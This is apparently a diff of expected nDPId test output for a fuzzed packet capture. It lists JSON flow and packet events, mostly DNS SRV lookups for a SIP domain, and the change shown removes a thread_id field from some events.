00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":337,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470251907,"flow_last_seen":1120470251907,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470251907,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2766,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":337,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470251907,"flow_last_seen":1120470251907,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470251907,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2766,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":338,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":123,"flow_packet_id":2,"flow_last_seen":1120470253909,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470253909,"pkt":"ADBUADRWAODtAW69CABFAABIatAAAIARTIHAqAECwKgBAQrOADUANK35e\/0BAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZTBjaXR5AmRrAAAhAAE="} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":338,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":123,"flow_packet_id":2,"flow_last_seen":1120470253909,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470253909,"pkt":"ADBUADRWAODtAW69CABFAABIatAAAIARTIHAqAECwKgBAQrOADUANK35e\/0BAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZTBjaXR5AmRrAAAhAAE="}
00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":338,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470251907,"flow_last_seen":1120470253909,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470253909,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2766,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybe0city.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":338,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470251907,"flow_last_seen":1120470253909,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470253909,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2766,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybe0city.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00414{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":339,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":43690,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120470253909,"pkt":"ADBUAKqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 00400{"packet_event_id":1,"packet_event_name":"packet","packet_id":339,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":43690,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120470253909,"pkt":"ADBUAKqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
00213{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":339,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":43690,"global_ts_msec":1120470255912} 00199{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":339,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":43690,"global_ts_msec":1120470255912}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":343,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470259918,"flow_last_seen":1120470259918,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470259918,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":14798,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":343,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470259918,"flow_last_seen":1120470259918,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470259918,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":14798,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":343,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":124,"flow_packet_id":1,"flow_last_seen":1120470259918,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470259918,"pkt":"ADBUADRWAODtAW69CABFAABIatkAAIQRTHjAqAECwKgBATnOADUANK35e\/0BAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhABE="} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":343,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":124,"flow_packet_id":1,"flow_last_seen":1120470259918,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470259918,"pkt":"ADBUADRWAODtAW69CABFAABIatkAAIQRTHjAqAECwKgBATnOADUANK35e\/0BAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhABE="}
00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":343,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470259918,"flow_last_seen":1120470259918,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470259918,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":14798,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":343,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470259918,"flow_last_seen":1120470259918,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470259918,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":14798,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
@@ -611,8 +611,8 @@
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":347,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470267925,"flow_last_seen":1120470267925,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470267925,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2768,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":347,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470267925,"flow_last_seen":1120470267925,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470267925,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2768,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":347,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":126,"flow_packet_id":1,"flow_last_seen":1120470267925,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470267925,"pkt":"ADBUADRWAODtAW69CABFAABIatwAAIARTHXAqAECwKgBAQrQADUANDb28v4BAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":347,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":126,"flow_packet_id":1,"flow_last_seen":1120470267925,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470267925,"pkt":"ADBUADRWAODtAW69CABFAABIatwAAIARTHXAqAECwKgBAQrQADUANDb28v4BAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":347,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470267925,"flow_last_seen":1120470267925,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470267925,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2768,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":347,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470267925,"flow_last_seen":1120470267925,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470267925,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2768,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00413{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":350,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120470268180,"pkt":"ADBUADRWAODtAW69CABFAGhIat4AAIARTHPAqAECwKgBAQrQADUANDb28v4BAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00399{"packet_event_id":1,"packet_event_name":"packet","packet_id":350,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120470268180,"pkt":"ADBUADRWAODtAW69CABFAGhIat4AAIARTHPAqAECwKgBAQrQADUANDb28v4BAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
00230{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":350,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":52,"global_ts_msec":1120470268921} 00216{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":350,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":52,"global_ts_msec":1120470268921}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":351,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470270925,"flow_last_seen":1120470270925,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470270925,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":35536,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":351,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470270925,"flow_last_seen":1120470270925,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470270925,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":35536,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":351,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":127,"flow_packet_id":1,"flow_last_seen":1120470270925,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470270925,"pkt":"ADBUADRWAODtAW69CABFAABIat8AAIARTHLAqAECwKgBAYrQADUANDb28v4BAAABwwAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":351,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":127,"flow_packet_id":1,"flow_last_seen":1120470270925,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470270925,"pkt":"ADBUADRWAODtAW69CABFAABIat8AAIARTHLAqAECwKgBAYrQADUANDb28v4BAAABwwAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":351,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470270925,"flow_last_seen":1120470270925,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470270925,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":35536,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":351,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470270925,"flow_last_seen":1120470270925,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470270925,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":35536,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
@@ -633,27 +633,27 @@
00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":354,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470284935,"flow_last_seen":1120470284935,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470284935,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2769,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":354,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470284935,"flow_last_seen":1120470284935,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470284935,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2769,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":355,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470284936,"flow_last_seen":1120470284936,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470284936,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":117,"dst_port":2769,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":355,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470284936,"flow_last_seen":1120470284936,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470284936,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":117,"dst_port":2769,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":355,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":130,"flow_packet_id":1,"flow_last_seen":1120470284936,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120470284936,"pkt":"AODtAW4FADBUADRWCABFAABbAABAAEARtz7AqAEBwKgBAgB1CtEARyVzAP+AAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3QA"} 00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":355,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":130,"flow_packet_id":1,"flow_last_seen":1120470284936,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120470284936,"pkt":"AODtAW4FADBUADRWCABFAABbAABAAEARtz7AqAEBwKgBAgB1CtEARyVzAP+AAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3QA"}
00361{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":356,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":47,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":47,"pkt_l4_len":0,"thread_ts_msec":1120470284936,"pkt":"ADBUADRWAODtAW69CABFAAAhauMAqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":356,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":47,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":47,"pkt_l4_len":0,"thread_ts_msec":1120470284936,"pkt":"ADBUADRWAODtAW69CABFAAAhauMAqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
00230{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":356,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":13,"global_ts_msec":1120470284937} 00216{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":356,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":13,"global_ts_msec":1120470284937}
00661{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":357,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470102883,"flow_last_seen":1120470102883,"flow_idle_time":180000,"flow_min_l4_payload_len":375,"flow_max_l4_payload_len":375,"flow_tot_l4_payload_len":375,"flow_avg_l4_payload_len":375,"midstream":0,"thread_ts_msec":1120470284936,"l3_proto":"ip4","src_ip":"192.86.1.2","dst_ip":"200.68.120.99","src_port":5060,"dst_port":5060,"l4_proto":"udp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 00661{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":357,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470102883,"flow_last_seen":1120470102883,"flow_idle_time":180000,"flow_min_l4_payload_len":375,"flow_max_l4_payload_len":375,"flow_tot_l4_payload_len":375,"flow_avg_l4_payload_len":375,"midstream":0,"thread_ts_msec":1120470284936,"l3_proto":"ip4","src_ip":"192.86.1.2","dst_ip":"200.68.120.99","src_port":5060,"dst_port":5060,"l4_proto":"udp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
00598{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":357,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470102883,"flow_last_seen":1120470102883,"flow_idle_time":180000,"flow_min_l4_payload_len":375,"flow_max_l4_payload_len":375,"flow_tot_l4_payload_len":375,"flow_avg_l4_payload_len":375,"midstream":0,"thread_ts_msec":1120470284936,"l3_proto":"ip4","src_ip":"192.86.1.2","dst_ip":"200.68.120.99","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00598{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":357,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470102883,"flow_last_seen":1120470102883,"flow_idle_time":180000,"flow_min_l4_payload_len":375,"flow_max_l4_payload_len":375,"flow_tot_l4_payload_len":375,"flow_avg_l4_payload_len":375,"midstream":0,"thread_ts_msec":1120470284936,"l3_proto":"ip4","src_ip":"192.86.1.2","dst_ip":"200.68.120.99","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
